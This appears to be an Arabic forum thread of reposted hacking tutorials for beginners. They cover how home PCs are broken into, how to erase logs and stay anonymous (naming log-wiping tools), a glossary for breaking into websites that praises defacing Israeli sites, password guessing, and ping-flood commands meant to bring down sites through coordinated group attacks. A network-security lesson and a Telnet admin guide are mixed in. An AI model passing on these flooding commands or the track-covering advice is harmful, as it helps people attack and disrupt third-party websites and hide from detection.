من المعروف أن نظام ويندوز يسمح للمستخدم بتحديد أحد المجلدات أو الأقراص الصلبة في جهازه للمشاركة من قبل أشخاص آخرين على الشبكة. بالطبع فإن هذه الخاصية مفيدة جدا ولها تطبيقات كثيرة نافعة للمستخدم، ولكن عندما تكون متصلا بالإنترنت فإن كل من يرى جهازك سيستطيع أن يرى هذه المجلدات التي وضعتها للمشاركة ويبقى العائق الوحيد للدخول عليها هو الحصول على كلمة السر. طبعا قد تتساءل "كيف يستطيع الآخرون الوصول لي ؟ وأنا جهاز ضمن الملايين من الأجهزة على الإنترنت" يؤسفني أن أقول لك أنه يتوافر الكثير من البرامج (وكما قلنا فلن نذكر أسماءها حتى لا يساء استخدامها ) والتي تمكن للشخص من البحث عن المجلدات الموضوعة للمشاركة في أجهزة المستخدمين. وبعد الحصول على قائمة بهذه الأجهزة فإنه ما على المخترق إلا أن يقوم بتشغيل برنامج يقوم بمحاولة "تخمين" كلمة السر (ويوجد أيضا الكثير من البرامج من هذا النوع) والتي تقوم بتجريب آلاف الكلمات والتي تم تخزينها مسبقا في ملف حتى تصل إلى كلمة السر الخاصة بالمجلد الموضوع للمشاركة. وما يزيد الطين بلة أن بعض المستخدمين يقومون بمشاركة القرص الصلب بكامله !! وبعضهم يستخدم كلمة سر بسيطة من حرف أو حرفين !! مما يسهل المهمة على الهاكر ويجعله يحتار في أي الملفات يسرق وأيها يترك !!

أحد البرامج التي تقوم بالبحث عن المجلدات الموضوعة المشاركة

4- سرقة كلمة السر المخزنة:
يقوم نظام ويندوز بتخزين كلمة السر في ملف وذلك لكي يسترجعها بسرعة في حالة الحاجة إليها، بالطبع فإن كلمة السر يتم تخزينها بشكل مشفر(encrypted ) ، ولكن لا شيء يستعصي على الهاكرز. فحين حصول الهاكر على هذا الملف (والذي ينتهي بالامتداد PWL ) فإن كلمة السر الخاصة بجهازك هي ملك له وذلك لوجود العديد من البرامج التي تقوم بفك تشفير هذا الملف والحصول على كلمة السر. بالطبع فإن نظام ويندوز 98 يحتوي على تشفير أقوى من الذي كان موجودا في نظام ويندوز95 ، ولكنها مسألة وقت حتى يقوم الهاكرز بإيجاد برنامج يقوم بكسر هذا التشفير.

5- برامج وتطبيقات الإنترنت
إن تطبيقات الإنترنت ليست مجرد متصفحات فحسب ! بل إن هناك العديد من التطبيقات والبرامج الأخرى التي يتم استخدامها في الإنترنت. ولكن هذه البرامج قد تحتوي على العديد من الثغرات الأمنية التي تكون الباب المشرع الذي يستخدمه الهاكر للدخول في جهازك و إيذائك ! ومن هذه البرامج برنامج ICQ الشهير الذي يستخدمه الملايين من المستخدمين في الإنترنت. وهو يعتبر من أكثر البرامج شعبية بين مستخدمي الإنترنت نظرا لما يقدمه من خدمات تسهل التواصل بين المستخدمين. ولكنه أيضا من أكثر البرامج شعبية للهاكرز نظرا لما يقدمه من إمكانيات للتخريب والعبث بأجهزة ضحاياهم. فيوجد في الإنترنت العديد من البرامج التي تقوم بمهاجمة المستخدمين لهذا البرنامج، ويختلف تأثير هذه البرامج من الحصول على رقم IP الخاص بالمستخدم إلى القيام بإرسال كمية هائلة من البيانات لديه حتى يتوقف الجهاز عن الاستجابة للمستخدم مما يضطره للقيام بعملية إعادة للتشغيل!

6- 6- المواقع المشبوهة:
من فترة لأخرى يتم اكتشاف الكثير من الثغرات الأمنية في المتصفحات ويتم استغلال هذه الثغرات بشكل كبير من قبل أصحاب مواقع الهاكرز. هذه الثغرات قد تمكن المخترق من الحصول على بعض الملفات والمعلومات الشخصية من جهازك. لذا يجب عليك الحذر عند زيارة المواقع التي يشتبه في كون أصحابها من المخترقين نظرا لقدرة أصحاب المواقع على وضع بريمجات في مواقعهم لاستغلال الثغرات الأمنية في متصفحك والدخول إلى جهازك. وأبسط الأمثلة على ذلك ما يقوم به بعض المخربون من وضع بريمج (script) يقوم بتكرار تشغيل برنامج المتصفح وفتح نوافذ جديدة حتى تنتهي موارد النظام ويصبح لا يستجيب للمستخدم مما يضطره لإعادة تشغيل الجهاز ! بالطبع فإن هذه الثغرة تم تلافيها في متصفح إنترنت اكسبلورر 4 وما فوق ولكنها تعطي مثالا بسيطا للتخريب الذي ممكن أن يقوم به المخترقون.

7- الخدمات الإضافية:
يشتمل نظام التشغيل على بعض الخدمات الإضافية التي قد لا يحتاجها المستخدم والتي قد تكون المدخل إلى جهازك، فمثلا بعض الإصدارات من نظام ويندوز تحتوي على خادم ويب وخادم FTP وخادم بريد إلكتروني (SMTP) وهي لا تستخدم من قبل غالب المستخدمين ولكنها تحتوي في أغلب الأحيان على ثغرات أمنية تمكن المخترقين من العبث بجهازك. ويتم دائما إصدار تعديلات لهذه المشاكل الأمنية ولكن أغلب المستخدمين لا يقومون بتركيبها. لذا فمن المستحسن أثناء تركيب نظام التشغيل أن يقوم المستخدم بإلغاء تركيب هذه الخدمات عندما لا يكون محتاجا لها وفي حالة كان المستخدم محتاجا لها، فمن المستحسن إيقاف تشغيلها عن اتصاله بالإنترنت حتى لا يكون المنفذ الذي تعمل عليه هذه البرامج مفتوحا مما يسد الطريق على المخترقين الذي يريدون استغلال هذه الخدمات للدخول في جهازك.


بالطبع فإن ما ذكرناه في هذا المقال لا يشمل جميع الطرق التي يستخدمها الهاكرز ، ولكنه كاف لإعطاء فكرة عن هذه الطرق ورفع درجة الحذر لدى المستخدمين عن اتصالهم بالإنترنت، مما يسهم في التقليل من احتمالية تعرضهم للإختراق.
في العدد القادم بإذن الله سنقوم بالتحدث عن الطرق والبرامج الدفاعية التي يجب على المستخدم استخدامها لاتقاء الهاكرز و شرورهم.
انتهى،،،
__________________
[align=center][glint]لا إله إلا الله محمداً رسول الله[/glint]
[caution]لا إله إلا الله محمداً رسول الله
سبحان الله و بحمده ... سبحان الله العظيم
اللهم قني عذاب جهنم و عذاب القبر و فتنة المحيى و الممات و شر فتنة المسيح الدجال ... آمين [/caution]
[/align]
[align=center][BIMG]http://img403.imageshack.us/img403/2711/75415822sj7.gif[/BIMG][/align]
[align=center][BIMG]http://img403.imageshack.us/img403/2711/75415822sj7.gif[/BIMG][/align]

[email protected]
Syrian Hacker غير متصل  
قديم 16-02-2008, 01:53   #3
:: عضو مميز ::
 
الصورة الرمزية Syrian Hacker
 
تاريخ التسجيل: Feb 2008
الدولة: System32\Config\SAM
المشاركات: 112
"الأمن عبر الإنترنت"
<منقول من منتدى إعصار>
<الكاتب: JawaDal>
<المترجم: z3r0>
هناك الكثير الذي يجب ان تعرفوه قبل ان تفكروا في تعلم اختراق المواقع و السيرفرات
حسناا here we G0
الكثير من الناس يعملوا هاكينج من غير ما يعرفوا.. بيفتحوا الdos او shell account. يكتبوا شويه اوامر و بووم. it reboots .ديه مش ثغره!. لقد تم اختراقك!!!
حتى لما تستخدم امر بسيط مثل:FTP ftp://hostname/ في الدوس عندك و تدوس انتر
او عندك GFI LANguard network security scanner و عملت سكان على سايت و لقيت كذا بورت مفتوح و منهم بورت 21.. بتدوس عليه و تتصل بالموقع..و نفس الشيئ عن طريق التلنت..هذا يعني انه تم اختراقك!!
ده عشان لما بتعمل log in باوامر ftp بسيطه زي: cd lcd dir ls... و اي حاجه تانيه
لان مجرد ماتعمل log in في حاجه اسمهاLOGS...(LOG.FILES) 1
ايه بقى الLOG ده؟؟‍‍
الlog files ديه بتسجل كل شئ عن كل شخص اتصل بالجهاز(loged in) و يحصلوا على معلومات مثل:

يرون متى عملت الهاكينج بالضبط
من اي موقع اتيت
فضلت اد ايهonline
الIP Address بتاعك <<<<<<<
الhost name (اسم الجهاز)
القاره
الدوله
المدينه
المتصفح
نظام التشغيل
الscreen resolution
الوان الشاشه
مزود الخدمه الخاص بك(ISP)<<<<

هناك 3 انواع log files مهمه:
WTMP - يسجل كل دخول\خروج، مع ميعاد الدخول\الخروج بالاضافه الى الhost و tty
UTMP -من Onlne في هذه اللحظه
LASLOG -من اي جاء الدخول\خروج

و الكثير الكثير!! لذا لو الادمن اراد ان يلقي نظره عليهم (log.files) سوف يوقع بك(track you down) ...

ربما تقول: مفيش مشكله انا هاستخدم بروكسي! بس ادي حلجه لازم تعرفها عن البروكسيهات
جهازك-->خادم البروكسي-->الموقع--FTP--تلنت او اي شئ اخر!
لو اخترقت موقع و الادمن عاوز يعرف انت مين.لو معاه شويه فلوس هيعرف!او حتي يخترق البروكسي سيرفر و هيجيبك .. نفس الكلام لو بتستخدم اكثر من بروكسي
جهازك-->خادم البروكسي الاول-->خادم البروكسي الثاني-->الثالث--so on--...
يقدر يجيبك بس هيحتاج فلوس كثير و وقت اكثر!!لكن في النهايه يقدر..

لكن تقدر ايضا تستخدم شيئ اسمه.. Wingate :-
Wingate هو بروكسي يسمح بمشاركه كونكشن انترنت واحد او اكثر.. فائده الWingate انه سيخفي الIP عن الكمبيوتر الذي ستتصل به!!
لكن للاسف هذا كل ما اعرفه عنه..1 نحتاج بعض الاشخاص الاذكياء ليعلمونا كيف نستخدمه و اين نجده؟!
ماذا ايضاا....اممممممــم
اه تذكرت!!.. قبل كل شئ يجب ان تعرف كيف تظل anonymous على الweb.. و كيف تؤمن جهازك؟!!......مثل الspyware. استخدم firewall مثل الzone alarm . امسح ملفات الهيستوري(كالكوكيز و الانترنت هيستوري و ملفات الانترنت المؤقته..و الملفات الشخصيه و اللوق) انا افعل هذه الاشياء كل يوم قبل ان ادخل عالنت!! لدي برنامج رائع اسمه windows washer يجب ان يكون عندك., لقد خصلت عليه من المدرسه.. سرقته هاهاها.

و الكثير. اذهب لجوجل و اكتب how to Stay anonymous on the web او how to secure to secure my computer
او زور موقع امني جيد و ابحث عن شئ كهذا .. و انا متأكد انك ستجد الكثير ..
و لا تنسى الPreety Good Privacy (PGP)d انه مجاني .. يجب ان يكون عندك لو كنت تريد اختراق موقع و تترك ايميلك فيه!
تستطيع ان تحصل عليه من: http://www.pgpi.org/
ok اظن ان هذا كل ما يمكنني كتابته لكن هناك الكثير لكن يجب ان تبحث عنه!

ارجوا ان يعلمك هذا الدرس شيئا يا اخواني

لكن لدي سؤال الان .. و لست الوحيد الذي يحتاج الاجابه .. هذه الاجابه يجب ان يعرفها الجميع قبل ان يتعلم الهاكينج

1-كيف تستخدم الwingate ؟ و اين نجده؟
كيف نمسح اللوقز؟ و كيف نجدهم؟ و كيف نتأكد ان كل شئ على ما يرام؟!و كيف نتأكد اننا لم نترك اي اثارtracks خلفنا؟
ها هو برنامج اعرفه: و اسمه log modifier
ah-1_0b.tar clear.c cloak2.c invisible.c marryv11.c wzap.c wtmped.c zap.c
==================================================

==========================================
هذا يا اخي كل ما عرفته في اخر اسبوعين. و سألت سؤالين او اكثر عن كيفيه البقاء anonymous عالنت و عن استخدام البروكسيز و بعض الناس جاوبوني. لكن بالنهايه ليس المهم كم سؤال سألت .. يجب ان تجد الاجابه هذا هو المهم.!!! لذا ارجو يا اخي ان تبحث في هذا المجال اولا ثم بعدها تتعلم الاختراق.
انتهى،،،





"أمن الشبكات"
<منقول من منتدى إعصار>
<الكاتب:الجوكر>
فى هذا الموضووع سأتناول بعض طرق الحماية نقلا عن كتاب .
وهذا لإفتقار هذا القسم لمواضيع مثل هذه .
لذلك أرجو سماع وزاع ضميركم .
--------------------------------------------------------
1- عرض لبعض المخاطر الأمنية التي قد تتعرض لها الشبكة و كيفية الوقاية منها.
2- وصف لعلاقة الولوج الى الشبكة بأمنها.
3- كيفية حماية الموارد بواسطة تراخيص الوصول.
4- شرح لمكونات ACL.
5- شرح لعملية تفحص التراخيص.

أي شبكة قد تكون عرضة للوصول غير المرخص لأي مما يلي:

1- المعدات.

3- البيانات.

3- عمليات الشبكة.

4- الموارد.

تعتمد درجة أمن الشبكة على مدى حساسية البيانات المتداولة عبر الشبكة.

و يتم تنظيم الأمن وفقا لنوع الشبكة ، ففي شبكات الند للند كل جهاز يتحكم في أمنه الخاص ، بينما يتحكم المزود في أمن شبكات الزبون المزود.

و هناك بعض الإجراءات التي تساعد في المحافظة على أمن الشبكة:

1- التدريب المتقن للمستخدمين على التعامل مع إجراءات الأمن.

2- التأكد من أمن المعدات و صعوبة الوصول اليها من قبل غير المخولين.

3- حماية الأسلاك النحاسية و إخفاءها عن الأعين لأنها قد تكون عرضة للتجسس.

4- تشفير البيانات عند الحاجة أما مقاييس التشفير فتضعها وكالة الأمن الوطني الأمريكية National Security Agency (NSA).

5- تزويد المستخدمين بأجهزة لا تحتوي على محركات أقراص مرنة أو مضغوطة أو حتى أقراص صلبة ، و تتصل هذه الأجهزة بالمزودات باستخدام رقاقة إقلاع ROM Boot Chip و عند تشغيل هذه الأجهزة يقوم المزود بتحميل برنامج الإقلاع في ذاكرة RAM للجهاز ليبدأ بالعمل.

6-استخدام برامج لتسجيل جميع العمليات التي يتم إجراؤها على الشبكة لمراجعتها عند الضرورة.

7- إعطاء تصاريح Permissions للمستخدمين للوصول للبيانات و المعدات كل حسب طبيعة عمله و في هذه الحالة يجب مشاركة البيانات و المعدات للسماح للآخرين باستخدامها.

8- تزويد المستخدمين بحقوق Rights تحدد الأنشطة و العمليات المسموح لهم إجراءها على النظام.

هناك نظامان أساسيان لإعطاء التصاريح و الحقوق :

1- المشاركة المحمية بكلمة مرور.

2- تصاريح الوصول.

في النظام الأول يتم تعيين كلمة سر لكل من الموارد المطلوب مشاركتها و يتم الوصول لهذه الموارد فقط من قبل من لديه كلمة السر.

كما تستطيع تحديد درجة الوصول هل هي للقراءة فقط أم وصول كامل أم وفقا لكلمة السر.

في النظام الثاني يتم تعيين الحقوق و إعطاء التصاريح لكل مستخدم أو مجموعة مستخدمين ، و يكفي أن يدخل المستخدم كلمة المرور عند الدخول الى نظام التشغيل ليتعرف النظام على حقوق هذا المستخدم و التصاريح المتوفرة له، و يعتبر هذا النظام أكثر أمنا من النظام السابق و يعطي مدير الشبكة تحكما أكبر بكل مستخدم.

عند إدخال الإسم و كلمة المرور يتم تمرير هذه المعلومات الى مدير أمن الحسابات Security Accounts Manager (SAM) فإذا كان الولوج الى جهاز Workstation فإن المعلومات يتم مقارنتها مع قاعدة بيانات حسابات الأمن المحلية في الجهاز، أما إذا كان الولوج الى نطاق Domain فإن المعلومات يتم إرسالها الى مزود SAM الذي يقارنها مع قاعدة بيانات حسابات النطاق، فإذا كان اسم المستخدم أو كلمة المرور غير صالحين فإن المستخدم يمنع من الدخول الى النظام، أما إذا كانا صحيحين فإن نظام الأمن الفرعي يقوم بإصدار بطاقة ولوج Access Token تعرف النظام بالمستخدم فترة ولوجه و تحتوي هذه البطاقة على المعلومات التالية:

1- المعرف الأمني Security Identifier (SID) و هو رقم فريد خاص بكل حساب.

2- معرفات المجموعة Group SIDs و هي التي تحدد المجموعة التي ينتمي لها المستخدم.

3- الإمتيازات Privileges و هي تمثل الحقوق الممنوحة لحسابك.

كما أنه يتم إصدار Access Token عند محاولتك الإتصال من جهازك بجهاز آخر على شبكتك و يطلق على هذا الإجراء الولوج عن بعد Remote Logon.

من الأمور التي يجب مراعاتها عند الحديث عن أمن الشبكة هو المحافظة على أمن الموارد مثل الطابعات و محركات الأقراص و الملفات و التي يقوم مدير الشبكة بتعيين تصاريح لإستخدام هذه الموارد.

و من التصاريح التي قد تعطى للوصول الى الملفات ما يلي:

1- تصريح قراءة و يسمح لك بعرض و نسخ الملفات.

2- تصريح تنفيذ للتطبيقات.

3- تصريح كتابة و يسمح بالتعديل في محتوى الملفات.

4- ممنوع الإستخدام No Access.

و التصاريح ممكن منحها لمستخدم أو مجموعة من المستخدمين و هذا أٍسهل.

يمتلك كل مورد من الموارد قائمة تحكم بالوصول Access Control List (ACL) و كل معلومة يتم إدخالها في ACL يطلق عليها Access Control Entry (ACE).

يتم إنشاء ACE عند منح التصريح لإستخدام المورد و تحتوي على SID للمستخدم أو مجموعته الممنوحة التصريح بالإضافة الى نوع التصريح، فلو افترضنا أن مدير مجموعة ما قد مُنح تصريح قراءة و تصريح كتابة لملف ما فإن ACE جديد يتم إنشاؤه ثم إضافته الى ACL الخاص بالملف و سيحتوي ACE على SID لمدير المجموعة بالإضافة الى تصريح قراءة و تصريح كتابة.

هناك نوعان ل ACE :

1- الوصول مسموح AccessAllowed.

2- الوصول ممنوع AccessDenied و يتم إنشاؤها إذا كان تصريح الوصول هو No Access.

و هكذا عندما يحاول مستخدم ما الوصول الى مورد ما يتم مقارنة SID الخاص به مع SIDs في كل ACE من ACL للمورد.

في ويندوز NT و ويندوز 2000 يتم ترتيب ACE بحيث تكون AccessDenied ACEs قبل AccessAllowed ACEs ، فإذا وجد SID خاصتك في أي من AccessDenied ACEs فستمنع من الوصول الى المورد و إلا فسيبحث في AccessAllowed ACEs للتأكد من الحقوق الممنوحة لك فإن لم يعثر على SID مطابق لخاصتك فستعرض رسالة تحذير تمنعك من الوصول للمورد.

ملخص الدرس:

هناك بعض الإجراءات التي يجب اتخاذها للمحافظة على أمن الشبكة و منها:
تدريب المستخدمين ، حماية المعدات ، تشفير البيانات ، استخدام أجهزة عديمة الأقراص ، مراقبة العمليات التي تجرى على الشبكة.

هناك نظامان أساسيان لإعطاء التصاريح و الحقوق :

1- المشاركة المحمية بكلمة مرور.

2- تصاريح الوصول.
انتهى،،،

يتبع ..
__________________
[align=center][glint]لا إله إلا الله محمداً رسول الله[/glint]
[caution]لا إله إلا الله محمداً رسول الله
سبحان الله و بحمده ... سبحان الله العظيم
اللهم قني عذاب جهنم و عذاب القبر و فتنة المحيى و الممات و شر فتنة المسيح الدجال ... آمين [/caution]
[/align]
[align=center][BIMG]http://img403.imageshack.us/img403/2711/75415822sj7.gif[/BIMG][/align]
[align=center][BIMG]http://img403.imageshack.us/img403/2711/75415822sj7.gif[/BIMG][/align]

[email protected]
Syrian Hacker غير متصل  
قديم 16-02-2008, 01:54   #4
:: عضو مميز ::
 
الصورة الرمزية Syrian Hacker
 
تاريخ التسجيل: Feb 2008
الدولة: System32\Config\SAM
المشاركات: 112
"مصطلحات مهمة للمبتدئين في اختراق المواقع"
<منقول>
<الكاتب:BeReal>
السلام عليكم
لقد اعددت هذا الملف لاخواني المبتدئين في تعلم طرق اختراق المواقع ، فقد
تواجههم بعض الكلمات التي قد تكون غريبة عليهم و التي قد لا يفهمونها ،
و بالتالي تشكل لهم بعض العواقب في مواصلة الفهم و التعلم . فالله الموفق.
================================================== ===================
تلنت (Telnet):- و هو برنامج صغير موجود في الويندوز . و هو يعمل ككلاينت
أو وضعيته تكون دائما كزبون . أي أن باستطاعة هذا البرنامج الإتصال بالسيرفر
أوالخادم و اجراء بعض العمليات كل حسب مستواها و حالتها . يستخدمه الهاكرز
غالبا لمعرفة نظام تشغيل الموقع و السيرفر التابع له ، و للإتصال بالسيرفر
عبر بورت معين و خصوصا بورت الإف تي بي (21) للدخول الى الموقع بطريقة خفية
Anonymous Mode لعرض ملفات الموقع و سحب ملف الباسورد او غيره من البيانات.
لاستخدام البرنامج ، اذهب الى Start ==> Run ==> telnet و ستظهر شاشة التلنت.
------------------------------------------------------------------------

برامج السكان أو Scanner:- و هي برامج موجودة للمسح على المواقع و كشف
ثغراتهاإن وجدت ، فهي سريعة، كما أنها تملك قاعدة بيانات واسعة و كبيرة
تحتوي على الثغرات أو الاكسبلويت (Exploits) التي يتم تطبيقها على الموقع
لرؤية فيما اذا كان السيرفر يعاني من احدى هذه الثغرات أم لا . و من أمثلة
هذه البرامج، برنامج Shadow Security Scanner و Stealth و Omran Fast
Scanner ، الخ .
و لهذه البرامج أنواع مختلفة ، منها التي تقوم بعمل سكان على نظام أو سيرفر
معين مثل البرامج المختصة بالسكان على سيرفرات الـ IIS و منها برامج المسح
على ثغرات السي جي اي فقط CGI و ما الى ذلك .
-----------------------------------------------------------------------

اكسبلويت (Exploits):- هي برامج تنفيذية تنفذ من خلال المتصفح . و لها عنوان
URL ، تقوم هذه الإكسبلويتات بعرض ملفات الموقع و تقوم بعضها بالدخول الى
السيرفر و التجول فيه ، كما توجد اكسبلويتات تقوم بشن هجوم على بورت معين
في السيرفر لعمل كراش له ، و هذا ما يسمى بـ Buffer Over Flow Exploits .
هناك أنواع من الإكسبلويت ، فمنها ال CGI Exploits أو ال CGI Bugs و منها
ال Unicodes Exploits و منها ال ، Buffer Over Flow Exploits ، و منها
ال PHP Exploits ،و منها الDOS Exploits و التي تقوم بعملية حجب الخدمة
للسيرفر إن وجد فيها الثغرة المطلوبة لهذا الهجوم و ان لم يكن على السيرفر
أي فايروول Fire Wall . و هناك بعض الإكسبلويتات المكتوبة بلغة السي و يكون
امتدادها (.c) .
هذه الإكسبلويتات بالذات تحتاج الى كومبايلر او برنامجا لترجمتها و تحويها
أي الاكسبلويت الى اكسبلويت تنفيذي عادي يستخدم من خلال المتصفح ، و لتحويل
الإكسبلويت المكتبو بلغة السي هذه الى برنامجا تنفيذيا ، نحتاج إما الى
نظام التشغيل لينوكس او يونكس ، او الى اي كومبايلر يعمل ضمن نظام التشغيل
ويندوز . أشهر هذه الكومبايلرات ( المترجمات أو المحولات ) برنامج اسمه
Borland C++ Compiler و هي تعمل تحت نظام التشغيل ويندوز كما ذكرنا سابقا.
----------------------------------------------------------------------

الجدار الناري FireWall:- هي برامج تستعملها السيرفرات لحمايتها من الولوج
الغير شرعي لنظام ملفاتها من قبل المتطفلين . هي تمثل الحماية للسيرفر طبعا ،
و لكني أنوه بأن الفايروولات المستخدمة لحماية السيرفرات ( المواقع ) تختلف
عن تلك التي تستخدم لحماية الأجهزة .
----------------------------------------------------------------------

Token:- هو ملف الباسورد المظلل (Shadowed Passwd) و الذي يكون فيه الباسورد
على شكل * أو x أي Shadowed . إن وجدت ملف الباسورد مظللا ، فيجب عليك حينها
البحث عن ملف الباسورد الغير المظلل و الذي يسمى Shadow file . تجده في
/etc/shadow .
----------------------------------------------------------------------

Anonymouse:- هي الوضعية الخفية و المجهولة التي تدخل فيها الى الموقع المراد
اختراقه. هناك خاصية في برامج الاف تي بي بنفس الإسم ، تستطيع ان تستعملها
في الدخول المجهول الى السيرفر و سحب الملفات منه .
----------------------------------------------------------------------

Valnerableties:- أي الثغرات أو مواضع الضعف الغير محصنة أو القابلة للعطب
و التي يعاني منها السيرفر و التي قد تشكل خطرا أمنيا عليه مما يؤدي الى
استغلالها من قبل الهاكرز في مهاجمة السيرفر و اختراقه أو تدميره .
ما هي مفردها ؟ ، Valnerable أي ثغرة أو بالأصح موضع الضعف و المكان
الغير مؤمن بشكل سليم . و تكثر هذه الكلمة في القوائم البريدية للمواقع المهتمة
بالسيكيوريتي و أمن الشبكات و غيرها كالقائمة البريدية الموجودة في موقع
Security Focus أو بوق تراك او غيرها .
----------------------------------------------------------------------

passwd file : هو الملف الذي يحتوي على باسورد الروت و باسوردات الأشخاص
المصرح لهم بالدخول الى السيرفر . باسورد الموقع موجود في نفس الملف طبعا.
----------------------------------------------------------------------
الجذر أو الـ root : و هو المستخدم الجذري و الرئيسي للنظام ، له كل الصلاحيات
في التعامل مع ملفات الموقع و السيرفر من إزالة أو اضافة أو تعديل للملفات.
غالبا ما يكون باسورد الروت هو باسورد الموقع نفسه في المواقع التي تعمل ضمن
نظام التشغيل لينوكس او يونكس و سولاري و فري بي اس دي و غيرها .
----------------------------------------------------------------------
السيرفر Server: هو الجهاز المستضيف للموقع ، اذ أن كل ملفات الموقع توضع فيه
فهو جهاز كمبيوتر عاد كغيره من الأجهزة لكنه ذو امكانيات عالية ككبر حجم القرص
الصلب و سرعته الهائلة ، و هو متصل بالإنترنت 24 ساعة ، و هذا هو سبب كون
المواقع شغالة 24 على الإنترنت . قد يملك و يستضيف السيرفر أكثر من موقع
واحد، و هذا يعتمد من سيرفر لآخر و من شركة لأخرى. ضربة الهاكرز طبعا هي اختراق
السيرفر الذي يملك الكثير من المواقع ، فيسهل حينها اختراق جميع المواقع التي
تندرج تحته مما يؤدي إما الى تدميرها أو العبث في ملفاتها أو تشويه واجهتها أو
سرقة بياناتها و تدميرها أو مسحها من النت تماما ، و هذا ما يحدث للمواقع
الإسرائيلية و بكثرة و لله الحمد . - جزاكم الله خيرا أيها المجاهدون - .
-----------------------------------------------------------------------
بوفر أوفر فلو ( Buffer over Flow ) : و هي نوع من أنواع الاكسبلويتات التي
تستعمل لشن هجوم الطفح على نقطة معينة من السيرفر مثل الهجوم على بورت الإف تي بي
أو غيره لأجل اضعاف اتصال السيرفر و فصل اتصاله بهذا بهذا البورت و لالغاء الرقعة
الموجودة بها كي يتم استغلالها مجددا - بعد عمل الكراش لها طبعا - يتم استغلالها
في معاودة الإتصال لها و بسهولة و دون وجود أي رقع او حواجز و سحب البيانات منها .
و هي شبيهة نوعا ما بعملية حجب الخدمة - DOS - اذ أنها تقوم بعملية اوفر لود على
جزء مركز من السيرفر .
انتهى،،،
__________________
[align=center][glint]لا إله إلا الله محمداً رسول الله[/glint]
[caution]لا إله إلا الله محمداً رسول الله
سبحان الله و بحمده ... سبحان الله العظيم
اللهم قني عذاب جهنم و عذاب القبر و فتنة المحيى و الممات و شر فتنة المسيح الدجال ... آمين [/caution]
[/align]
[align=center][BIMG]http://img403.imageshack.us/img403/2711/75415822sj7.gif[/BIMG][/align]
[align=center][BIMG]http://img403.imageshack.us/img403/2711/75415822sj7.gif[/BIMG][/align]

[email protected]
Syrian Hacker غير متصل  
قديم 16-02-2008, 01:56   #5
:: عضو مميز ::
 
الصورة الرمزية Syrian Hacker
 
تاريخ التسجيل: Feb 2008
الدولة: System32\Config\SAM
المشاركات: 112
"اختراق المواقع للمبتدئين"
الإختراق للمبتدئين:::
في هذا القسم سوف أقوم بشرح الطرق المستخدمة في اختراق المواقع بالنسبة للمبتدئين وهذه الطرق تعتمد
اعتماداً كلياً على برامج التخمين. وهذه البرامج تحتوي على قائمة كبيرة تحتوي على كلمات سر يقوم
البرنامج بتجربها على الموقع الهدف الى أن يصل إلى كلمة السر الصحيحة الخاصة بالموقع الهدف وبعد
ذلك يسيطر المخترق على الموقع. لكن يعيب هذه الطريقة أنها تستمر إلى أوقات طويلة بالساعات وبالأيام
وهي مكلفة ماديا لأن الجهاز سيبقى متصلا طوال الوقت بالأنترنت حتى يتم اكتشاف كلمة السرالصحيحة.

انتهى،،،

" تدمير المواقع بدون برامج "
<الكاتب:ماكس هاك >

في هذا الدرس سأقوم بشرح عدة طرق لتدمير المواقع بدون برامج ولكن هناك شرط لتدميرها أن يجتمع عدد كبير على الموقع نفسه ويقوموا بتطيق الطريقة معا بعض في نفس الوقت...
الطريقة الأولى::
قم بالتوجه إلى "الدوس" ===>== اكتب الأمر التالي :ـ
Ping www.xx.com
يعني اسم الموقع :Xxx
بعد ذلك سيخرج لك رقم أي بي الموقع.
قم بكتابة الأمر:
(اسم الموقع) (قوة الضربه) -I (عددالضربات) ping -n
مثال ذلك:
ping -n 1000 -l 400 www.xxx.com
الطريقة الثانية::
بعد استخراج الأي بي تبع الموقع المراد بالطريقة الي في الأعلى...
قم بكتابة الأمر:
ping -t ip
حيث ip يعني أي بي الموقع الموراد.
انتهى،،،





" التلنيت "
<منقول من موقع نورة>
بعد قراءة هذا الموضوع ستكون قادر على
فهم معنى خدمة التلنت
معرفة مكان تشغيل الخدمة والتحكم بها
تمرين التثبيت وإستخدام التلنت
خدمة التلنت في ويندوز 2000 تسمح لمستخدمين عميل التلنت بالإتصال بكمبيوتر يشغل خدمة التلنت وإستعمال سطر الأوامر ويصبح كما لو كان يجلس أمامه ، ويمكن أن تكون خدمة التلنت عبارة لإتصال المستخدمين مع بعضهم البعض
وأي كمبيوتر يشغل خدمة التلنت يمكن أن يدعم إلى 63 عميل تلنت في أي وقت
Telnet Authentication
You can use your local Windows 2000 user name and password or domain account information to access the Telnet server. The security scheme is integrated into Windows 2000 security. If you do not use the NT LAN Manager (NTLM) authentication option, the user name and password are sent to the Telnet server as plain text.s 2000 security context for authentication and the user is not prompted for a user
If you are using NTLM authentication, the client uses the Windowname and password. The user name and password are encrypted.يمكن استعمال اسمك وكلمة المرور الخاصه بك من اجل الوصول إلى ملقم التلنت ، إذا كنت تستخدم خيار التحقق من الصحة NTLM سيرسل الاسم و كلمة المرور مشفرة وإذا لم تكن مستخدمة سترسل كنص عادي
ملاحظة
If the User Must Change Password At Next Logon option is set for a user, the user cannot log on to the Telnet service when NTLM authentication is used. The user must log on to the server directly and change the password, and then log on through the Telnet client. إذا كان هذا الخيار منشط في خصائص كلمة المرور لأحد المستخدمين لن يتمكن من الدخول على ملقم التلنت عند إستخدام NTLM يجب الدخول ثم تغير كلمة المرور ثم التسجيل على خدمة التلنت

تشغيل و إيقاف ملقم التلنت
In a Windows 2000 Server default installation, the Telnet service is set to manual startup. You can use the Services snap-in or the Computer Management snap-in to start, stop, or configure the Telnet service for automatic startup. في التثبيت الافتراضي لويندوز 2000 تكون خدمة التلنت غير منشطة وتكون على الوضع اليدوي ، ويمكن إستخدام الأداة Services لتشغيل أو إيقاف خدمة التلنت

مكان التلنت
In the Computer Management snap-in, Telnet is a service located under the Services and Applications node. Select Services from the console tree, and then select Telnet from the list of services in the details pane.
تشغيل التلنت و إيقافة من سطر الاوامر
You can also start or stop the Telnet service from a command prompt. To start Telnet Server, type net start tlntsvr or net start telnet at the command prompt, and then press Enter. To stop Telnet Server, type net stop tlntsvr or net stop telnet at the command prompt, and then press Enter.
الأداة Telnet Server Admin
You can use the Telnet Server Admin utility to start, stop, or get information about Telnet Server. You can also use it to get a list of current users, terminate a user's session, or change Telnet Server registry settings.يمكن إستخدام الأداة Telnet Server Admin لتشغيل أو إيقاف أو الحصول على معلومات عن الملقم ويمكن كذلك الحصول على عدد المستخدمين و التحكم في الجلسة الحالية من إنهاء الإتصال و تغير الاعدادات
